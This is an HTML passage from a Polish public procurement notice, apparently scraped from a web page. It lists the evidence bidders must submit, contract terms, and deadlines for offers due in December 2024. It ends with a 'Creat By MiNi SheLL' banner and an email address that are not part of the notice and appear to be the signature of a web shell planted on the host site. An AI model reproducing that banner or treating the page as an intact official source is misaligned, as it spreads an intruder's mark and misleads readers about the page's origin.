class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">- oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy<br/>kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020<br/>r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o<br/>dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej<br/>wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy<br/>kapitałowej (według wzoru stanowiącego Załącznik nr 5 do SWZ);<br/>- oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust.<br/>1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa<br/>w:<br/>• art. 108 ust. 1 pkt 3 ustawy,<br/>• art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne<br/>tytułem środka zapobiegawczego,<br/>• art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na<br/>celu zakłóceni konkurencji,<br/>• art. 108 ust. 1 pkt 6 ustawy (według wzoru stanowiącego Załącznik nr 6 do SWZ)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych,<br/>w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których <br/>usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy ta usługa została <br/>wykonana lub jest wykonywana należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń<br/>powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niegonie jest w<br/>stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzającychsię lub<br/>ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (zalecany wzór stanowi Załącznik nr 7 do<br/>SWZ),<br/>- wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami (zalecany wzór stanowi Załącznik nr 8 do SWZ),<br/>- wykazu narzędzi/urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego<br/>wraz z informacją o podstawie do dysponowania tymi zasobami (zalecany wzór stanowi Załącznik nr 9 do SWZ);</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art. 58 ustawy. W takim przypadku,<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli oferta wykonawców, o której<br/>mowa w zdaniu poprzedzającym, została wybrana, zamawiający może żądać przed<br/>zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z Art. 455 ustawy PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-11 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com